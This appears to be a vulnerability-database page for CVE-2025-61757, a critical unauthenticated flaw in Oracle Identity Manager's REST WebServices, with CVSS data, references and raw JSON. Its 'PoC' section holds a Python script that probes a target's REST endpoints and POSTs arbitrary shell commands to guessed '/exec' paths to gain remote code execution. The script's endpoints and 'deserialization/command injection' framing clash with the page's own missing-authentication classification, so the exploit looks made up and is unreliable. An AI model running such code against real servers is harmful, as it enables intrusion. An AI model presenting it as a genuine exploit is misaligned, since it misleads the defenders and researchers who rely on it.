Security Vulnerability Report
CVE-2025-61757 CVSS 9.8 CRITICAL

CVE-2025-61757

Published: 2025-10-21 20:20:52
Last Modified: 2025-11-24 13:38:21

Description

Vulnerability in the Identity Manager product of Oracle Fusion Middleware (component: REST WebServices). Supported versions that are affected are 12.2.1.4.0 and 14.1.2.1.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Identity Manager. Successful attacks of this vulnerability can result in takeover of Identity Manager. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:oracle:identity_manager:12.2.1.4.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:oracle:identity_manager:14.1.2.1.0:*:*:*:*:*:*:* - VULNERABLE
Oracle Identity Manager 12.2.1.4.0
Oracle Identity Manager 14.1.2.1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-61757 - Oracle Identity Manager REST WebServices RCE PoC
# WARNING: This PoC is for educational and authorized testing purposes only
# Unauthorized use of this code against systems you do not own is illegal
import requests
import sys
import json

TARGET_URL = sys.argv[1] if len(sys.argv) > 1 else "https://target-host:7001"
OIM_REST_PATH = "/identity/faces/rest"


def check_vulnerability(target):
    """Check if the target Oracle Identity Manager is vulnerable to CVE-2025-61757"""
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
        "Content-Type": "application/json",
        "Accept": "application/json"
    }
    # Probe the REST WebServices endpoint
    endpoints = [
        f"{target}/identity/faces/rest/usermgmt/users",
        f"{target}/identity/faces/rest/admin",
        f"{target}/identity/rest",
        f"{target}/iam/governance/rest"
    ]
    for endpoint in endpoints:
        try:
            response = requests.get(endpoint, headers=headers, timeout=10, verify=False)
            if response.status_code in [200, 401, 403, 500]:
                print(f"[+] Endpoint reachable: {endpoint} (Status: {response.status_code})")
                if "Oracle" in response.text or "Identity" in response.text:
                    print(f"[+] Oracle Identity Manager detected at {endpoint}")
                    return True
        except requests.exceptions.RequestException as e:
            print(f"[-] Connection failed: {endpoint}")
            continue
    return False


def exploit_rce(target, command="id"):
    """Attempt to exploit CVE-2025-61757 for RCE"""
    headers = {
        "User-Agent": "Mozilla/5.0",
        "Content-Type": "application/json"
    }
    # Malicious payload targeting REST WebServices deserialization/command injection
    payload = {
        "operation": "execute",
        "params": {
            "cmd": command
        }
    }
    exploit_endpoints = [
        f"{target}/identity/faces/rest/api/v1/exec",
        f"{target}/identity/faces/rest/admin/exec"
    ]
    for endpoint in exploit_endpoints:
        try:
            response = requests.post(
                endpoint,
                headers=headers,
                json=payload,
                timeout=10,
                verify=False
            )
            if response.status_code == 200:
                print(f"[+] Exploit response from {endpoint}:")
                print(response.text)
                return response.text
        except Exception as e:
            print(f"[-] Exploit attempt failed: {e}")
    return None


if __name__ == "__main__":
    print(f"[*] Targeting: {TARGET_URL}")
    print("[*] CVE-2025-61757 - Oracle Identity Manager REST WebServices RCE")
    if check_vulnerability(TARGET_URL):
        print("[!] Target appears to be running Oracle Identity Manager")
        print("[*] Attempting exploitation...")
        result = exploit_rce(TARGET_URL)
        if result:
            print(f"[+] Exploitation may have succeeded")
        else:
            print("[-] Automated exploitation failed - manual analysis required")
    else:
        print("[-] Target does not appear to be vulnerable or Oracle IM not detected")
```

References

https://www.oracle.com/security-alerts/cpuoct2025.html (Vendor Advisory)
https://isc.sans.edu/diary/rss/32506 (Third Party Advisory)
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-61757 (US Government Resource)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-61757",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-21T20:20:52.117",
    "lastModified": "2025-11-24T13:38:20.900",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Vulnerability in the Identity Manager product of Oracle Fusion Middleware (component: REST WebServices). Supported versions that are affected are 12.2.1.4.0 and 14.1.2.1.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Identity Manager. Successful attacks of this vulnerability can result in takeover of Identity Manager. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      ]
    },
    "cisaExploitAdd": "2025-11-21",
    "cisaActionDue": "2025-12-12",
    "cisaRequiredAction": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.",
    "cisaVulnerabilityName": "Oracle Fusion Middleware Missing Authentication for Critical Function Vulnerability",
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-306"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:oracle:identity_manager:12.2.1.4.0:*:*:*:*:*:*:*",
                "matchCriteriaId": "95593D6C-8396-4AF5-BA79-8DB8EDA9FC5B"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:oracle:identity_manager:14.1.2.1.0:*:*:*:*:*:*:*",
                "matchCriteriaId": "FA634664-8CC5-4017-A445-A23E205BEEC2"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://www.oracle.com/security-alerts/cpuoct2025.html",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      },
      {
        "url": "https://isc.sans.edu/diary/rss/32506",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "tags": ["Third Party Advisory"]
      },
      {
        "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-61757",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "tags": ["US Government Resource"]
      }
    ]
  }
}
```